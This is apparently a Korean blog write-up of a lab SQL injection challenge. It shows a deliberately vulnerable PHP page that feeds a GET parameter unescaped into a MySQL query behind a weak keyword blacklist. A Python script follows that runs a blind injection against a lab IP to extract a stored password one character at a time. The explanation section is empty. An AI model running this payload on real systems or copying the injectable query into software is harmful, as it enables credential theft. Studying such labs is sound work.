SQL Injection

1.

 

<html>
<head>
<title>SQL Binary</title>
</head>
<body>
<?php
@mysql_connect("localhost","","");
@mysql_select_db("");

/*

mysql> desc mem;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| no    | int(50)     | YES  |     | NULL    |       |
| id    | varchar(50) | YES  |     | NULL    |       |
| pw    | varchar(50) | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)

*/

if($_GET[no])
{
    if(eregi("from|union|ascii|char|0x",$_GET[no])) exit("Access Denied");
    $q=@mysql_fetch_array(mysql_query("select * from mem where no=$_GET[no]"));
    if($q)
    {
        echo("no : $q[no]<br>id : $q[id]<br>pw : ?");
        exit();
    }
}

echo("<form method=get action=index.php>user_no<br><input type=text name=no value=1><br><br><input type=submit></form>");
?>
<br>
<a href=index.phps>index.phps</a>
</body>
</html>

 

 

 

SQL Injection을 이용해 웹 페이지에서 비밀번호를 추측하려는 스크립트 ↓

import requests
import os

search='?'

lower=list()
for n in range(0, 130):
    if n<131:
        lower.append(n)
        n=n+1
        
for i in range(1,8):
    for l in lower:                
        URL="http://192.168.101.201/challenges/sql_binary/index.php?no=2 and ord(substr(pw,"+str(i)+",1))="+str(l)+"%23"
        res = requests.get(URL)
        if search in res.text:
            m=chr(l)
            print(i,m,l)

 

 

 

코드 해석

 

 

 

 

 

---

 

 

 

2.